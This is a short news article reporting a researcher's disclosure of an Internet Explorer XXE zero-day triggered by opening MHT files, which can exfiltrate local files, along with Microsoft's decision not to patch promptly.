Security researcher, John Page, has published details and test code for an Internet Explorer zero-day exploit that allows hackers to steal files from systems running on Windows.
According to Page, this exploit stems from an ‘XXE’ (XML eXternal Entity) vulnerability in Internet Explorer when users open a MHT file with the browser. All MHT files are defaulted to open with Internet Explorer as other browsers do not save web pages in this outdated format anymore, instead using the standard HTML file format that still carries support for the format.
Page explains that this vulnerability will allow hackers to “potentially exfiltrate Local files and conduct remote reconnaissance on locally installed Program version information”. This vulnerability usually require some form of interaction, like double-clicking on a MHT file, but Page further states that “this interaction could be automated and not needed to trigger the vulnerability exploit chain.”
What’s more concerning is that Page has tested this exploit in the latest version of Internet Explorer v11 with most recent security patches on Windows 7, Windows 10 and Windows Server 2012 R2 systems.
While Internet Explorer isn’t as widely used now, users don't necessarily have to have it set as their default browser, and are still vulnerable as long as Internet Explorer is still present on their systems.
Page has notified Microsoft of this zero-day exploit, however they responded with a firm "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
Following this response, Page has taken upon himself to published the details of this exploit on his site, as well as a Youtube video demonstrating the vulnerability.